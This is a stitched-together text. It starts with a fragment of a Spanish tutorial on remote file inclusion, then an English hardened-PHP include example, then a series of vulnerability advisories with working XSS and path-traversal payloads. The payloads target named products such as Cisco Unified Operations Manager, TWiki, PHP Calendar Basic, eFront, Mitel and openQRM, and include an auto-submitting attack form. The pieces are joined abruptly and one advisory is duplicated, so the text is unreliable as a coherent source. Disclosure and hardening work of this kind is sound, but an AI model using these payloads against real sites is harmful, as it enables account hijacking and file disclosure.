Nótese como al concatenar el nuevo parámetro cmd a todo los demás, hemos usado un ampersand (&). Esto es porque la interrogación que corresponde siempre al primer parámetro, ya está siendo usada por el parámetro file.

Parece que se nos interpreta correctamente el archivo malicioso y estamos ejecutando comandos. Si vemos en que máquina estamos, podemos ver que estamos en el kali, dicho de otra forma, el servidor web vulnerable:

image 132

We are executing commands locally using a remotely hosted file. This is, in essence, a Remote File Inclusion.
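The include call that the LFI and RFI above share is what has to change; the following is an added example (not the tutorial's code) of the hardened form: an allow-list of page keys instead of a user-supplied path, a containment check on the resolved file, and a fail-closed check on allow_url_include. The page names and directory are constructed for the example.

```php
<?php
// Added example (not the tutorial's code): the include pattern behind the
// LFI/RFI shown above, hardened. Page names and directory are constructed.
//
// Vulnerable shape from the tutorial (do not use):
//     include($_GET['file']);   // accepts "/etc/hosts", "http://<host>/sikushell.php", ...

declare(strict_types=1);

// Defence in depth: refuse to run at all if remote includes are enabled,
// regardless of what php.ini says today.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('Refusing to run with allow_url_include=On');
}

// Only these keys are accepted; the user never supplies a path or a URL.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the page to include, or null if the key is
// not allow-listed or the resolved file somehow escapes PAGE_DIR.
function resolvePage(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;   // "../../etc/hosts", "http://...", "php://..." all land here
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    // realpath() follows symlinks, so re-check containment on the result.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolvePage((string)($_GET['file'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

With this shape the file parameter never reaches include() as a path, so neither the local (/etc/hosts) nor the remote (sikushell.php) inclusion from the walkthrough is possible, even if allow_url_include is later switched back on.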

source: https://www.securityfocus.com/bid/47901/info
 
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
 
This issue is being tracked by Cisco Bug ID CSCtn61716.
 
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
http://www.example.com/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap

source: https://www.securityfocus.com/bid/47899/info

TWiki is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to TWiki 5.0.2 are vulnerable. 


GET /twiki/bin/login/Sandbox/WebHome?%27%221=;origurl=1%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x00039C%29%3C/script%3E

GET /twiki/bin/login/Sandbox/WebHome?sudo=sudo;origurl=http://10.1.10.128/bin/view/Main/TWikiAdminUser%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x00044C%29%3C%2Fscript%3E
source: https://www.securityfocus.com/bid/47901/info

Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.

This issue is being tracked by Cisco Bug ID CSCtn61716.

Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
source: https://www.securityfocus.com/bid/47887/info

PHP Calendar Basic is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

PHP Calendar Basic 2.3 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?month=5"><script>alert('XSS')</script>&year=2011"><script>alert(document.cookie)</script>

<form action="http://www.example.com/event_add.php?day=27&month=4&year=2011" method="post" name="main">
<input type="hidden" name="month" value="4">
<input type="hidden" name="day" value="27">
<input type="hidden" name="year" value="2011">
<input type="hidden" name="hour" value="20">
<input type="hidden" name="minute" value="00">
<input type="hidden" name="title" value="1<script>alert('XSS')</script>">
<input type="hidden" name="description" value="descr">
<input type="submit" id="btn" name="submit" value="Add Event">
</form>
<script>
document.getElementById('btn').click();
</script>


http://www.example.com/event_delete.php?day=28&month=4&year=2011&id=1"><script>alert(document.cookie)</script>

source: https://www.securityfocus.com/bid/47877/info

eFront is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 

http://www.example.com/efront/www/modules/module_crossword/app/submitScore.php?seq=<script>alert(0)</script>&cookie=<script>alert(0)</script>
source: https://www.securityfocus.com/bid/47874/info

Mitel Audio and Web Conferencing is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Audio and Web Conferencing 4.4.3.0 is vulnerable; other versions may also be affected.

https://www.example.com/wd/wdinvite.asp?SID='><script>alert(1)</script>

https://www.example.com/wd/connect.asp?mode=joinmeeting&uid='><script>alert(1)</script>&sid='><script>alert(1)</script>

https://www.example.com/wd/applets/Error.asp?type=</span><script>alert(1)</script>

source: https://www.securityfocus.com/bid/47870/info

eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

eFront 3.6.9 build 10653 is vulnerable; other versions may also be affected. 

http://www.example.com/efront/www/js/scripts.php?load=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 
source: https://www.securityfocus.com/bid/47865/info

openQRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

openQRM 4.8 is vulnerable; other versions may also be affected. 

http://www.example.com/openqrm-4.8/src/plugins/zfs-storage/web/zfs-storage-action.php?source_tab="<script>alert(0)</script>